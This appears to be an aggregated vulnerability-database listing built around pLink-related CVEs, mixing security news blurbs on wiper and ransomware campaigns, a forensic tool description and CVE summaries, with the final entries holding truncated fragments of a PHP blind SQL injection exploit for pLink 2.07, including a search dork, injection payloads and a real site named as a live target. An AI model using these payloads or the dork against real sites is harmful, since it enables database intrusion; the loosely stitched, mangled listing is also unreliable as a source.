EUVD-2008-4338

Malware in sbrugna...

Pro-Iranian Hacker Group Targeting Albania with No-Justice Wiper Malware

The recent wave of cyber attacks targeting Albanian organizations involved the use of a wiper called No-Justice. The findings come from cybersecurity company ClearSky, which said the Windows-based malware "crashes the operating system in a way that it cannot be rebooted." The intrusions have been...

CACTUS Ransomware Exploits Qlik Sense Vulnerabilities in Targeted Attacks

A CACTUS ransomware campaign has been observed exploiting recently disclosed security flaws in a cloud analytics and business intelligence platform called Qlik Sense to obtain a foothold into targeted environments. "This campaign marks the first documented instance ... where threat actors deployi...

Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations

Threat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution RCE through Outlook Web Access OWA. "The new exploit method bypasses...

Gargamel - A Forensic Evidence Acquirer

A Forensic Evidence Acquirer Compile Assuming you have Rust 1.41+ installed. Open terminal in the project directory and to compile a release build type cargo build --release Debug build can be compiled using cargo build Compiled executable is located at target/release/gargamel.exe or...

CVE-2020-8585

CVE-2020-8585 affects NetApp OnCommand Unified Manager Core Package before version 5.2.5. The vulnerability enables disclosure of sensitive account information to unauthorized users via PuTTY Link (plink). No exploitation details are provided in the documents; the root cause is described as an in...

Netapp NetApp OnCommand Unified Manager 后置链接漏洞

Netapp NetApp OnCommand Unified Manager is a suite of ONTAP system management software from the U.S. company NetApp Netapp. The software can simplify data management, monitor the storage system infrastructure and detect failures. An information disclosure vulnerability exists in NetApp OnCommand...

Chafer APT Hits Middle East Govs With Latest Cyber-Espionage Attacks

Researchers have uncovered new cybercrime campaigns from the known Chafer advanced persistent threat APT group. The attacks have hit several air transportation and government victims in hopes of data exfiltration. The Chafer APT has been active since 2014 and has previously launched cyber espiona...

Plink & Plop Adventures - Dangerous filesystem permissions, Insecure KeyStore vulnerabilities

HackApp vulnerability scanner discovered that application Plink & Plop Adventures published at the 'play' market has multiple vulnerabilities...

CVE-2014-4620

The EMC NetWorker Module for MEDITECH aka NMMEDI 3.0 build 87 through 90, when EMC RecoverPoint and Plink are used, stores cleartext RecoverPoint Appliance credentials in nsrmedisv.raw log files, which allows local users to obtain sensitive information by reading these files...

CVE-2008-4357

SQL injection vulnerability in linkto.php in Powie pLink 2.07 allows remote attackers to execute arbitrary SQL commands via the id parameter...

Sql injection

SQL injection vulnerability in linkto.php in Powie pLink 2.07 allows remote attackers to execute arbitrary SQL commands via the id parameter...

CVE-2008-4357

SQL injection vulnerability in linkto.php in Powie pLink 2.07 allows remote attackers to execute arbitrary SQL commands via the id parameter...

CVE-2008-4357

CVE-2008-4357 concerns a SQL injection in linkto.php of Powie pLink 2.07, exploitable via the id parameter. Affected software: Powie pLink 2.07 (linkto.php). Root cause: unsanitized input leading to arbitrary SQL execution by remote attackers. Impact: potential disclosure, modification, or destru...

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

No description provided by source. ?php iniset"maxexecutiontime",0; printr' pLink 2.07 - Blind SQL Injection Exploit Vulnerability discovered by: Stack Exploit coded by: Stack Greetz to: All My Freind Dork: intext:"pLink 2.07" Admin Panel: Target/link/ Usage: php '.$argv0.' Target Userid Example...

pLink 2.07 - linkto.php Blind SQL Injection

pLink 2.07 - linkto.php Blind SQL Injection php '.$argv0.' http://www.site.com/link/linkto.php?id=128 2 Live Demo : http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2 '; if $argc 1 $url = $argv1; if $argc 3 $userid = 1; else $userid = $argv2; $r = strlenfilegetcontents$url."+and+1=1/"; ec...

pLink 2.07 - 'linkto.php' Blind SQL Injection

php '.$argv0.' http://www.site.com/link/linkto.php?id=128 2 Live Demo : http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2 '; if $argc 1 $url = $argv1; if $argc 3 $userid = 1; else $userid = $argv2; $r = strlenfilegetcontents$url."+and+1=1/"; echo "\nExploiting:\n"; $w =...

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= pLink 2.07 linkto.php id Remote Blind SQL Injection Exploit ============================================================= php '.$argv0.' http://www.site.com/link/linkto.php?id=1...